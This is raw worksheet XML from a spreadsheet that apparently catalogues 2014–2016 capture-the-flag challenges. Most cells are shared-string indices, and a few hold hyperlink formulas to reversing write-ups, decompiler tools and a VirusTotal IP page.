      <c r="C229" s="30" t="s">
        <v>4037</v>
      </c>
      <c r="D229" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E229" s="30" t="s">
        <v>997</v>
      </c>
      <c r="F229" s="30" t="s">
        <v>4041</v>
      </c>
      <c r="G229" s="30" t="s">
        <v>4042</v>
      </c>
      <c r="H229" s="30"/>
    </row>
    <row r="230">
      <c r="A230" s="30" t="s">
        <v>2136</v>
      </c>
      <c r="B230" s="31">
        <v>2015.0</v>
      </c>
      <c r="C230" s="30" t="s">
        <v>4043</v>
      </c>
      <c r="D230" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E230" s="30" t="s">
        <v>3838</v>
      </c>
      <c r="F230" s="144" t="s">
        <v>4044</v>
      </c>
      <c r="G230" s="30" t="s">
        <v>4045</v>
      </c>
      <c r="H230" s="30"/>
      <c r="I230" s="30"/>
    </row>
    <row r="231">
      <c r="A231" s="30" t="s">
        <v>2136</v>
      </c>
      <c r="B231" s="31">
        <v>2015.0</v>
      </c>
      <c r="C231" s="30" t="s">
        <v>4050</v>
      </c>
      <c r="D231" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E231" s="30" t="s">
        <v>3838</v>
      </c>
      <c r="F231" s="30" t="s">
        <v>4055</v>
      </c>
      <c r="G231" s="30" t="s">
        <v>4057</v>
      </c>
      <c r="H231" s="30"/>
      <c r="I231" s="30"/>
    </row>
    <row r="232">
      <c r="A232" s="30" t="s">
        <v>4059</v>
      </c>
      <c r="B232" s="31">
        <v>2015.0</v>
      </c>
      <c r="C232" s="30" t="s">
        <v>4060</v>
      </c>
      <c r="D232" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E232" s="30" t="s">
        <v>2080</v>
      </c>
      <c r="F232" s="30" t="s">
        <v>4064</v>
      </c>
      <c r="G232" s="33" t="str">
        <f>HYPERLINK("https://github.com/ByteBandits/writeups/blob/master/whitehat-grand-prix-quals-2015/reversing/dong%20wan/sudhackar/README.md","writeup and script")</f>
        <v>writeup and script</v>
      </c>
      <c r="H232" s="30" t="s">
        <v>4071</v>
      </c>
      <c r="I232" s="30"/>
      <c r="J232" s="30"/>
    </row>
    <row r="233">
      <c r="A233" s="30" t="s">
        <v>4059</v>
      </c>
      <c r="B233" s="31">
        <v>2015.0</v>
      </c>
      <c r="C233" s="30" t="s">
        <v>4073</v>
      </c>
      <c r="D233" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E233" s="30" t="s">
        <v>4075</v>
      </c>
      <c r="F233" s="30" t="s">
        <v>4076</v>
      </c>
      <c r="G233" s="30" t="s">
        <v>4078</v>
      </c>
      <c r="H233" s="30" t="s">
        <v>2108</v>
      </c>
      <c r="I233" s="33" t="str">
        <f>HYPERLINK("http://uaf.io/reverse%20engineering/2015/07/25/WhiteHat-Contest-10-RE-300.html","writeup and script")</f>
        <v>writeup and script</v>
      </c>
      <c r="J233" s="30"/>
    </row>
    <row r="234">
      <c r="A234" s="30" t="s">
        <v>4059</v>
      </c>
      <c r="B234" s="31">
        <v>2015.0</v>
      </c>
      <c r="C234" s="30" t="s">
        <v>4091</v>
      </c>
      <c r="D234" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E234" s="30" t="s">
        <v>4092</v>
      </c>
      <c r="F234" s="180" t="s">
        <v>4094</v>
      </c>
      <c r="G234" s="30" t="s">
        <v>4078</v>
      </c>
      <c r="H234" s="30"/>
      <c r="I234" s="30"/>
      <c r="J234" s="30"/>
    </row>
    <row r="235">
      <c r="A235" s="30" t="s">
        <v>4059</v>
      </c>
      <c r="B235" s="31">
        <v>2015.0</v>
      </c>
      <c r="C235" s="30" t="s">
        <v>4098</v>
      </c>
      <c r="D235" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E235" s="30" t="s">
        <v>3838</v>
      </c>
      <c r="F235" s="35" t="s">
        <v>3086</v>
      </c>
      <c r="G235" s="30" t="s">
        <v>4101</v>
      </c>
      <c r="H235" s="33" t="str">
        <f>HYPERLINK("https://www.virustotal.com/en/ip-address/222.255.46.146/information/","VirusTotal IP Stats")</f>
        <v>VirusTotal IP Stats</v>
      </c>
      <c r="I235" s="33" t="str">
        <f>HYPERLINK("https://github.com/alex/python-decompiler","Python - Decompiler")</f>
        <v>Python - Decompiler</v>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B236" s="31">
        <v>2015.0</v>
      </c>
      <c r="C236" s="30" t="s">
        <v>4116</v>
      </c>
      <c r="D236" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E236" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F236" s="35" t="s">
        <v>4119</v>
      </c>
      <c r="G236" s="30" t="s">
        <v>4121</v>
      </c>
      <c r="H236" s="33" t="str">
        <f>HYPERLINK("https://github.com/gstarnberger/uncompyle","Uncompyle - Python bytecode decoder")</f>
        <v>Uncompyle - Python bytecode decoder</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="19">
    <mergeCell ref="G148:H148"/>
    <mergeCell ref="G149:I149"/>
    <mergeCell ref="G150:I150"/>
    <mergeCell ref="G151:H151"/>
    <mergeCell ref="G147:H147"/>
    <mergeCell ref="G39:H39"/>
    <mergeCell ref="G31:H31"/>
    <mergeCell ref="G38:H38"/>
    <mergeCell ref="G30:H30"/>
    <mergeCell ref="G28:H28"/>
    <mergeCell ref="G29:H29"/>
    <mergeCell ref="G27:H27"/>
    <mergeCell ref="G71:J71"/>
    <mergeCell ref="G72:K72"/>
    <mergeCell ref="F50:K50"/>
    <mergeCell ref="F51:J51"/>
    <mergeCell ref="C52:E52"/>
    <mergeCell ref="G52:K52"/>
    <mergeCell ref="G40:H40"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="G3"/>
    <hyperlink r:id="rId2" ref="G8"/>
    <hyperlink r:id="rId3" ref="G9"/>
    <hyperlink r:id="rId4" location="Syntax" ref="G10"/>
    <hyperlink r:id="rId5" ref="G15"/>
    <hyperlink r:id="rId6" ref="G44"/>
    <hyperlink r:id="rId7" ref="G61"/>
    <hyperlink r:id="rId8" ref="G102"/>
    <hyperlink r:id="rId9" ref="H102"/>
    <hyperlink r:id="rId10" ref="G124"/>
    <hyperlink r:id="rId11" ref="G125"/>
    <hyperlink r:id="rId12" ref="G126"/>
    <hyperlink r:id="rId13" location="gid=1443626110" ref="F153"/>
    <hyperlink r:id="rId14" ref="G163"/>
    <hyperlink r:id="rId15" ref="G166"/>
    <hyperlink r:id="rId16" ref="G169"/>
    <hyperlink r:id="rId17" ref="G170"/>
    <hyperlink r:id="rId18" ref="G172"/>
    <hyperlink r:id="rId19" ref="G173"/>
    <hyperlink r:id="rId20" ref="G177"/>
    <hyperlink r:id="rId21" ref="H177"/>
    <hyperlink r:id="rId22" ref="G179"/>
    <hyperlink r:id="rId23" ref="G180"/>
    <hyperlink r:id="rId24" ref="G187"/>
    <hyperlink r:id="rId25" ref="G200"/>
    <hyperlink r:id="rId26" location="tab_tools" ref="G201"/>
    <hyperlink r:id="rId27" ref="H214"/>
    <hyperlink r:id="rId28" ref="H215"/>
    <hyperlink r:id="rId29" ref="G220"/>
    <hyperlink r:id="rId30" ref="F221"/>
    <hyperlink r:id="rId31" ref="G223"/>
    <hyperlink r:id="rId32" ref="G224"/>
    <hyperlink r:id="rId33" ref="H224"/>
    <hyperlink r:id="rId34" ref="H225"/>
    <hyperlink r:id="rId35" ref="G226"/>
    <hyperlink r:id="rId36" ref="H226"/>
    <hyperlink r:id="rId37" ref="G227"/>
    <hyperlink r:id="rId38" ref="G228"/>
    <hyperlink r:id="rId39" ref="I228"/>
    <hyperlink r:id="rId40" ref="J228"/>
    <hyperlink r:id="rId41" ref="G232"/>
    <hyperlink r:id="rId42" ref="I233"/>
    <hyperlink r:id="rId43" ref="H235"/>
    <hyperlink r:id="rId44" ref="I235"/>
    <hyperlink r:id="rId45" ref="H236"/>
  </hyperlinks>
  <drawing r:id="rId4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71"/>
    <col customWidth="1" min="5" max="5" width="13.86"/>
    <col customWidth="1" min="6" max="6" width="27.29"/>
    <col customWidth="1" min="7" max="7" width="58.29"/>
    <col customWidth="1" min="8" max="8" width="64.57"/>
    <col customWidth="1" min="9" max="9" width="19.43"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>2187</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="6" t="s">
        <v>9</v>
      </c>
      <c r="B2" s="7"/>
      <c r="C2" s="6"/>
      <c r="D2" s="6"/>
      <c r="E2" s="6"/>
      <c r="F2" s="6"/>
      <c r="G2" s="6"/>
      <c r="H2" s="6"/>
      <c r="I2" s="8"/>
      <c r="J2" s="8"/>
      <c r="K2" s="9"/>
      <c r="L2" s="9"/>
      <c r="M2" s="9"/>
      <c r="N2" s="9"/>
      <c r="O2" s="9"/>
      <c r="P2" s="9"/>
      <c r="Q2" s="9"/>
      <c r="R2" s="9"/>
      <c r="S2" s="9"/>
      <c r="T2" s="9"/>
      <c r="U2" s="9"/>
      <c r="V2" s="9"/>
      <c r="W2" s="9"/>
      <c r="X2" s="9"/>
      <c r="Y2" s="9"/>
      <c r="Z2" s="9"/>
    </row>
    <row r="3">
      <c r="A3" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B3" s="11">
        <v>2016.0</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>2191</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>2194</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>2195</v>
      </c>
      <c r="G3" s="13" t="s">
        <v>2196</v>
      </c>
      <c r="H3" s="14" t="s">
        <v>2200</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B4" s="11">
        <v>2016.0</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>2202</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>1222</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>2206</v>
      </c>
      <c r="G4" s="2" t="s">
        <v>2207</v>
      </c>
      <c r="H4" s="3"/>
    </row>
    <row r="5">
      <c r="A5" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B5" s="11">
        <v>2016.0</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>2208</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>1222</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>2206</v>
      </c>
      <c r="G5" s="2" t="s">
        <v>2211</v>
      </c>
      <c r="H5" s="3"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B6" s="11">
        <v>2014.0</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>2212</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>546</v>
      </c>
      <c r="F6" s="2" t="s">
        <v>2215</v>
      </c>
      <c r="G6" s="13" t="s">
        <v>2216</v>
      </c>
      <c r="H6" s="14" t="s">
        <v>2217</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B7" s="11">
        <v>2014.0</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>2220</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E7" s="3"/>
      <c r="F7" s="2" t="s">
        <v>2221</v>
      </c>
      <c r="G7" s="2" t="s">
        <v>2222</v>
      </c>
      <c r="H7" s="14" t="s">
        <v>2173</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B8" s="11">
        <v>2014.0</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>2223</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>1222</v>
      </c>
      <c r="F8" s="2" t="s">
        <v>2224</v>
      </c>
      <c r="G8" s="2" t="s">
        <v>446</v>
      </c>
      <c r="H8" s="14" t="s">
        <v>446</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B9" s="11">
        <v>2014.0</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>2226</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E9" s="3"/>
      <c r="F9" s="2" t="s">
        <v>2229</v>
      </c>
      <c r="G9" s="2" t="s">
        <v>2230</v>
      </c>
      <c r="H9" s="3"/>
    </row>
    <row r="10">
      <c r="A10" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B10" s="11">
        <v>2014.0</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>2231</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>2232</v>
      </c>
      <c r="F10" s="2" t="s">
        <v>2234</v>
      </c>
      <c r="G10" s="2" t="s">
        <v>2235</v>
      </c>
      <c r="H10" s="138" t="s">
        <v>2236</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B11" s="11">
        <v>2014.0</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>2239</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>1222</v>
      </c>
      <c r="F11" s="2" t="s">
        <v>2243</v>
      </c>
      <c r="G11" s="2" t="s">
        <v>2244</v>
      </c>
      <c r="H11" s="3"/>
    </row>
    <row r="12">
      <c r="A12" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B12" s="11">
        <v>2014.0</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>2247</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E12" s="2" t="s">
        <v>2249</v>
      </c>
      <c r="F12" s="2" t="s">
        <v>2250</v>
      </c>
      <c r="G12" s="13" t="s">
        <v>2252</v>
      </c>
      <c r="H12" s="138" t="s">
        <v>2253</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B13" s="11">
        <v>2014.0</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>2255</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>2257</v>
      </c>
      <c r="F13" s="2" t="s">
        <v>2258</v>
      </c>
      <c r="G13" s="13" t="s">
        <v>2259</v>
      </c>
      <c r="H13" s="139" t="s">
        <v>2261</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="3"/>
      <c r="B14" s="3"/>
      <c r="C14" s="3"/>
      <c r="D14" s="3"/>
      <c r="E14" s="3"/>
      <c r="F14" s="3"/>
      <c r="G14" s="13" t="s">
        <v>2271</v>
      </c>
      <c r="H14" s="138" t="s">
        <v>2273</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B15" s="11">
        <v>2014.0</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>2276</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E15" s="3"/>
      <c r="F15" s="2" t="s">
        <v>2277</v>
      </c>
      <c r="G15" s="2" t="s">
        <v>2278</v>
      </c>
      <c r="H15" s="138" t="s">
        <v>2279</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="s">
        <v>167</v>
      </c>
      <c r="B16" s="11">
        <v>2016.0</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>2281</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>2283</v>
      </c>
      <c r="F16" s="2" t="s">
        <v>2285</v>
      </c>
      <c r="G16" s="3"/>
      <c r="H16" s="138" t="s">
        <v>2287</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B17" s="11">
        <v>2014.0</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>2289</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E17" s="2" t="s">
        <v>2290</v>
      </c>
      <c r="F17" s="2" t="s">
        <v>2291</v>
      </c>
      <c r="G17" s="13" t="s">
        <v>2293</v>
      </c>
      <c r="H17" s="139" t="s">
        <v>2296</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="17">
        <v>42503.0</v>
      </c>
      <c r="B18" s="7"/>
      <c r="C18" s="6"/>
      <c r="D18" s="6"/>
      <c r="E18" s="6"/>
      <c r="F18" s="6"/>
      <c r="G18" s="6"/>
      <c r="H18" s="6"/>
      <c r="I18" s="8"/>
      <c r="J18" s="8"/>
      <c r="K18" s="9"/>
      <c r="L18" s="9"/>
      <c r="M18" s="9"/>
      <c r="N18" s="9"/>
      <c r="O18" s="9"/>
      <c r="P18" s="9"/>
      <c r="Q18" s="9"/>
      <c r="R18" s="9"/>
      <c r="S18" s="9"/>
      <c r="T18" s="9"/>
      <c r="U18" s="9"/>
      <c r="V18" s="9"/>
      <c r="W18" s="9"/>
      <c r="X18" s="9"/>
      <c r="Y18" s="9"/>
      <c r="Z18" s="9"/>
    </row>
    <row r="19">
      <c r="A19" s="2" t="s">
        <v>179</v>
      </c>
      <c r="B19" s="11">
        <v>2014.0</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>2304</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>2232</v>
      </c>
      <c r="F19" s="2" t="s">
        <v>2307</v>
      </c>
      <c r="G19" s="2" t="s">
        <v>2308</v>
      </c>
      <c r="H19" s="2" t="s">
        <v>2311</v>
      </c>
      <c r="I19" s="152" t="str">
        <f>HYPERLINK("https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/","LD_Preload Tricks")</f>
        <v>LD_Preload Tricks</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="2" t="s">
        <v>296</v>
      </c>
      <c r="B20" s="11">
        <v>2014.0</v>
      </c>
      <c r="C20" s="2" t="s">
        <v>2328</v>
      </c>
      <c r="D20" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E20" s="2" t="s">
        <v>2329</v>
      </c>
      <c r="F20" s="2" t="s">
        <v>2330</v>
      </c>
      <c r="G20" s="2" t="s">
        <v>2331</v>
      </c>
      <c r="H20" s="2" t="s">
        <v>2332</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="2" t="s">
        <v>296</v>
      </c>
      <c r="B21" s="11">
        <v>2014.0</v>
      </c>
      <c r="C21" s="2" t="s">
        <v>2333</v>
      </c>
      <c r="D21" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E21" s="2" t="s">
        <v>1222</v>
      </c>
      <c r="F21" s="2" t="s">
        <v>2334</v>
      </c>
      <c r="G21" s="2" t="s">
        <v>2335</v>
      </c>
      <c r="H21" s="2" t="s">
        <v>2336</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="2" t="s">
        <v>296</v>
      </c>
      <c r="B22" s="11">
        <v>2014.0</v>
      </c>
      <c r="C22" s="2" t="s">
        <v>2337</v>
      </c>
      <c r="D22" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E22" s="2" t="s">
        <v>2338</v>
      </c>
      <c r="F22" s="2" t="s">
        <v>2340</v>
      </c>
      <c r="G22" s="2" t="s">
        <v>2341</v>
      </c>
      <c r="H22" s="2" t="s">
        <v>2346</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="70" t="s">
        <v>38</v>
      </c>
      <c r="B23" s="71">
        <v>2014.0</v>
      </c>
      <c r="C23" s="70" t="s">
        <v>2348</v>
      </c>
      <c r="D23" s="70" t="s">
        <v>48</v>
      </c>
      <c r="E23" s="74" t="s">
        <v>1222</v>
      </c>
      <c r="F23" s="70" t="s">
        <v>2349</v>
      </c>
      <c r="G23" s="70" t="s">
        <v>2350</v>
      </c>
      <c r="H23" s="72"/>
      <c r="I23" s="29"/>
      <c r="J23" s="29"/>
      <c r="K23" s="29"/>
      <c r="L23" s="29"/>
      <c r="M23" s="29"/>
      <c r="N23" s="29"/>
      <c r="O23" s="29"/>
      <c r="P23" s="29"/>
      <c r="Q23" s="29"/>
      <c r="R23" s="29"/>
      <c r="S23" s="29"/>
      <c r="T23" s="29"/>
      <c r="U23" s="29"/>
      <c r="V23" s="29"/>
      <c r="W23" s="29"/>
      <c r="X23" s="29"/>
      <c r="Y23" s="29"/>
      <c r="Z23" s="29"/>
    </row>
    <row r="24">
      <c r="A24" s="70" t="s">
        <v>38</v>
      </c>
      <c r="B24" s="71">
        <v>2014.0</v>
      </c>
      <c r="C24" s="70" t="s">
        <v>2354</v>
      </c>
      <c r="D24" s="70" t="s">
        <v>48</v>
      </c>
      <c r="E24" s="70" t="s">
        <v>2355</v>
      </c>
      <c r="F24" s="70" t="s">
        <v>2356</v>
      </c>
      <c r="G24" s="70" t="s">
        <v>2357</v>
      </c>
      <c r="H24" s="72"/>
      <c r="I24" s="29"/>
      <c r="J24" s="29"/>
      <c r="K24" s="29"/>
      <c r="L24" s="29"/>
      <c r="M24" s="29"/>
      <c r="N24" s="29"/>
      <c r="O24" s="29"/>
      <c r="P24" s="29"/>
      <c r="Q24" s="29"/>
      <c r="R24" s="29"/>
      <c r="S24" s="29"/>
      <c r="T24" s="29"/>
      <c r="U24" s="29"/>
      <c r="V24" s="29"/>
      <c r="W24" s="29"/>
      <c r="X24" s="29"/>
      <c r="Y24" s="29"/>
      <c r="Z24" s="29"/>
    </row>
    <row r="25">
      <c r="A25" s="70" t="s">
        <v>38</v>
      </c>
      <c r="B25" s="71">
        <v>2014.0</v>
      </c>
      <c r="C25" s="70" t="s">
        <v>2358</v>
      </c>
      <c r="D25" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E25" s="74" t="s">
        <v>2290</v>
      </c>
      <c r="F25" s="70" t="s">
        <v>2359</v>
      </c>
      <c r="G25" s="70" t="s">
        <v>2360</v>
      </c>
      <c r="H25" s="72"/>
      <c r="I25" s="29"/>
      <c r="J25" s="29"/>
      <c r="K25" s="29"/>
      <c r="L25" s="29"/>
      <c r="M25" s="29"/>
      <c r="N25" s="29"/>
      <c r="O25" s="29"/>
      <c r="P25" s="29"/>
      <c r="Q25" s="29"/>
      <c r="R25" s="29"/>
      <c r="S25" s="29"/>
      <c r="T25" s="29"/>
      <c r="U25" s="29"/>
      <c r="V25" s="29"/>
      <c r="W25" s="29"/>
      <c r="X25" s="29"/>
      <c r="Y25" s="29"/>
      <c r="Z25" s="29"/>
    </row>
    <row r="26">
      <c r="A26" s="70" t="s">
        <v>38</v>
      </c>
      <c r="B26" s="71">
        <v>2014.0</v>
      </c>
      <c r="C26" s="70" t="s">
        <v>2361</v>
      </c>
      <c r="D26" s="70" t="s">
        <v>48</v>
      </c>
      <c r="E26" s="74" t="s">
        <v>2290</v>
      </c>
      <c r="F26" s="70" t="s">
        <v>2359</v>
      </c>
      <c r="G26" s="70" t="s">
        <v>130</v>
      </c>
      <c r="H26" s="72"/>
      <c r="I26" s="29"/>
      <c r="J26" s="29"/>
      <c r="K26" s="29"/>
      <c r="L26" s="29"/>
      <c r="M26" s="29"/>
      <c r="N26" s="29"/>
      <c r="O26" s="29"/>
      <c r="P26" s="29"/>
      <c r="Q26" s="29"/>
      <c r="R26" s="29"/>
      <c r="S26" s="29"/>
      <c r="T26" s="29"/>
      <c r="U26" s="29"/>
      <c r="V26" s="29"/>
      <c r="W26" s="29"/>
      <c r="X26" s="29"/>
      <c r="Y26" s="29"/>
      <c r="Z26" s="29"/>
    </row>
    <row r="27">
      <c r="A27" s="70" t="s">
        <v>38</v>
      </c>
      <c r="B27" s="71">
        <v>2014.0</v>
      </c>
      <c r="C27" s="70" t="s">
        <v>2363</v>
      </c>
      <c r="D27" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E27" s="74" t="s">
        <v>1222</v>
      </c>
      <c r="F27" s="70" t="s">
        <v>2365</v>
      </c>
      <c r="G27" s="70" t="s">
        <v>2366</v>
      </c>
      <c r="H27" s="72"/>
      <c r="I27" s="29"/>
      <c r="J27" s="29"/>
      <c r="K27" s="29"/>
      <c r="L27" s="29"/>
      <c r="M27" s="29"/>
      <c r="N27" s="29"/>
      <c r="O27" s="29"/>
      <c r="P27" s="29"/>
      <c r="Q27" s="29"/>
      <c r="R27" s="29"/>
      <c r="S27" s="29"/>
      <c r="T27" s="29"/>
      <c r="U27" s="29"/>
      <c r="V27" s="29"/>
      <c r="W27" s="29"/>
      <c r="X27" s="29"/>
      <c r="Y27" s="29"/>
      <c r="Z27" s="29"/>
    </row>
    <row r="28">
      <c r="A28" s="70" t="s">
        <v>38</v>
      </c>
      <c r="B28" s="71">
        <v>2014.0</v>
      </c>
      <c r="C28" s="70" t="s">
        <v>2368</v>
      </c>
      <c r="D28" s="70" t="s">
        <v>23</v>
      </c>
      <c r="E28" s="70" t="s">
        <v>2370</v>
      </c>
      <c r="F28" s="70" t="s">
        <v>2359</v>
      </c>
      <c r="G28" s="70" t="s">
        <v>2372</v>
      </c>
      <c r="H28" s="72"/>
      <c r="I28" s="29"/>
      <c r="J28" s="29"/>
      <c r="K28" s="29"/>
      <c r="L28" s="29"/>
      <c r="M28" s="29"/>
      <c r="N28" s="29"/>
      <c r="O28" s="29"/>
      <c r="P28" s="29"/>
      <c r="Q28" s="29"/>
      <c r="R28" s="29"/>
      <c r="S28" s="29"/>
      <c r="T28" s="29"/>
      <c r="U28" s="29"/>
      <c r="V28" s="29"/>
      <c r="W28" s="29"/>
      <c r="X28" s="29"/>
      <c r="Y28" s="29"/>
      <c r="Z28" s="29"/>
    </row>
    <row r="29">
      <c r="A29" s="70" t="s">
        <v>38</v>
      </c>
      <c r="B29" s="71">
        <v>2014.0</v>
      </c>
      <c r="C29" s="70" t="s">
        <v>2376</v>
      </c>
      <c r="D29" s="70" t="s">
        <v>48</v>
      </c>
      <c r="E29" s="70" t="s">
        <v>2377</v>
      </c>
      <c r="F29" s="70" t="s">
        <v>2379</v>
      </c>
      <c r="G29" s="70" t="s">
        <v>2380</v>
      </c>
      <c r="H29" s="79" t="s">
        <v>2381</v>
      </c>
      <c r="I29" s="29"/>
      <c r="J29" s="29"/>
      <c r="K29" s="29"/>
      <c r="L29" s="29"/>
      <c r="M29" s="29"/>
      <c r="N29" s="29"/>
      <c r="O29" s="29"/>
      <c r="P29" s="29"/>
      <c r="Q29" s="29"/>
      <c r="R29" s="29"/>
      <c r="S29" s="29"/>
      <c r="T29" s="29"/>
      <c r="U29" s="29"/>
      <c r="V29" s="29"/>
      <c r="W29" s="29"/>
      <c r="X29" s="29"/>
      <c r="Y29" s="29"/>
      <c r="Z29" s="29"/>
    </row>
    <row r="30">
      <c r="A30" s="17">
        <v>42507.0</v>
      </c>
      <c r="B30" s="7"/>
      <c r="C30" s="6"/>
      <c r="D30" s="6"/>
      <c r="E30" s="6"/>
      <c r="F30" s="6"/>
      <c r="G30" s="6"/>
      <c r="H30" s="6"/>
      <c r="I30" s="8"/>
      <c r="J30" s="8"/>
      <c r="K30" s="9"/>
      <c r="L30" s="9"/>
      <c r="M30" s="9"/>
      <c r="N30" s="9"/>
      <c r="O30" s="9"/>
      <c r="P30" s="9"/>
      <c r="Q30" s="9"/>
      <c r="R30" s="9"/>
      <c r="S30" s="9"/>
      <c r="T30" s="9"/>
      <c r="U30" s="9"/>
      <c r="V30" s="9"/>
      <c r="W30" s="9"/>
      <c r="X30" s="9"/>
      <c r="Y30" s="9"/>
      <c r="Z30" s="9"/>
    </row>
    <row r="31">
      <c r="A31" s="23" t="s">
        <v>236</v>
      </c>
      <c r="B31" s="24">
        <v>2014.0</v>
      </c>
      <c r="C31" s="23" t="s">
        <v>2396</v>
      </c>
      <c r="D31" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E31" s="23" t="s">
        <v>1222</v>
      </c>
      <c r="F31" s="23" t="s">
        <v>2398</v>
      </c>
      <c r="G31" s="23" t="s">
        <v>2400</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="23" t="s">
        <v>264</v>
      </c>
      <c r="B32" s="24">
        <v>2014.0</v>
      </c>
      <c r="C32" s="23" t="s">
        <v>2405</v>
      </c>
      <c r="D32" s="23" t="s">
        <v>23</v>
      </c>
      <c r="E32" s="23" t="s">
        <v>676</v>
      </c>
      <c r="F32" s="23" t="s">
        <v>2407</v>
      </c>
      <c r="G32" s="23" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="23" t="s">
        <v>264</v>
      </c>
      <c r="B33" s="24">
        <v>2014.0</v>
      </c>
      <c r="C33" s="23" t="s">
        <v>2415</v>
      </c>
      <c r="D33" s="23" t="s">
        <v>48</v>
      </c>
      <c r="E33" s="23" t="s">
        <v>71</v>
      </c>
      <c r="F33" s="23" t="s">
        <v>2417</v>
      </c>
      <c r="G33" s="23" t="s">
        <v>2418</v>
      </c>
      <c r="H33" s="23" t="s">
